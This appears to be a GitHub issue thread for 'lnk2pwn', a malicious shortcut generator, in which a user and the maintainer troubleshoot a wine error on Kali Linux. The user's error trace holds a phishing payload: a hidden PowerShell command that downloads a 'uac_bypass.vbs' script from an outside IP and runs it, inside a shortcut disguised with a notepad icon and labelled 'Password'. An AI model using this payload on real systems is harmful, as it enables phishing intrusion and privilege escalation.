search

tommelo / lnk2pwn

Malicious Shortcut(.lnk) Generator
MIT License
69 stars 12 forks source link

Not working - Issue with wine.exe #1

Closed danish1211 closed 5 years ago

danish1211 commented 6 years ago

We are running code on kali linux and mklink unable to find "target_path": "C:\Windows\System32\cmd.exe" defined in config.json

Error trace: [+] Generating the shortcut [Error 2] File not found: 'C:\Windows\System32\cmd.exe' Traceback (most recent call last): File "lnk2pwn.py", line 126, in main(cli_args) File "lnk2pwn.py", line 101, in main executor.execute(args) File "/root/Desktop/phishing/lnk2pwn/cmd/generatecmd.py", line 240, in execute self.delegate(args, json_config=json_config) File "/root/Desktop/phishing/lnk2pwn/cmd/command.py", line 113, in delegate self.handler(args, kwargs) File "/root/Desktop/phishing/lnk2pwn/cmd/generatecmd.py", line 172, in generate self.create_lnk(lnk_config, tmp_lnk) File "/root/Desktop/phishing/lnk2pwn/cmd/generatecmd.py", line 100, in __create_lnk return subprocess.check_output(arguments) File "/usr/lib/python2.7/subprocess.py", line 223, in check_output raise CalledProcessError(retcode, cmd, output=output) subprocess.CalledProcessError: Command '['wine', '/root/Desktop/phishing/lnk2pwn/bin/mklnk.exe', '-t', u'C:\Windows\System32\cmd.exe', '-o', '/tmp/lnk2pwn/lnk2pwn.lnk', '--window-style', u'MINIMIZED', '-w', u'C:\Windows\System32', '-a', u'/c powershell.exe -w hidden iwr -outf %tmp%\p.vbs http://192.168.10.122/uac_bypass.vbs & %tmp%\p.vbs', '-i', u'C:\Windows\System32\notepad.exe', '-d', u'Password']' returned non-zero exit status 1

tommelo commented 6 years ago

Hi @danish1211 Sounds like a wine issue, let's make sure you have everything set up properly by typing the following command:

wine C:\\Windows\\System32\\cmd.exe

Would you mind sharing the result?

danish1211 commented 6 years ago

wine C:\Windows\System32\cmd.exe Microsoft Windows 6.1.7601 (3.0.1)

Z:\root>

working perfectly on bash terminal

tommelo commented 6 years ago

@danish1211 Another one:

file ~/.wine/drive_c/windows/system32/cmd.exe

danish1211 commented 6 years ago

@tommelo I appreciate your help. root@kali:~# file ~/.wine/drive_c/windows/system32/cmd.exe /root/.wine/drive_c/windows/system32/cmd.exe: PE32+ executable (console) x86-64, for MS Windows

danish1211 commented 6 years ago

root@kali:~/Desktop/phishing/lnk2pwn# wine /root/Desktop/phishing/lnk2pwn/bin/mklnk.exe -t 'C:\Windows\System32\cmd.exe' -o /tmp/lnk2pwn/lnk2pwn.lnk -w C:\Windows\System32

[Error 2] File not found: 'C:\Windows\System32\cmd.exe'

danish1211 commented 6 years ago

may be problem with wine or mklnk.exe

tommelo commented 6 years ago

@danish1211 I'm going to upgrade my wine to the same version as yours to see if I can reproduce this issue.

I started to wonder, maybe it's not a good idea to depend on wine and Python. I'll look forward for a complete re-write in C.

Let me know if you have any thoughts on that!

danish1211 commented 6 years ago

Problem is with wine. I ran mklink.exe with required target exe, argument, icon path exe on windows machine and mklink was working perfectly.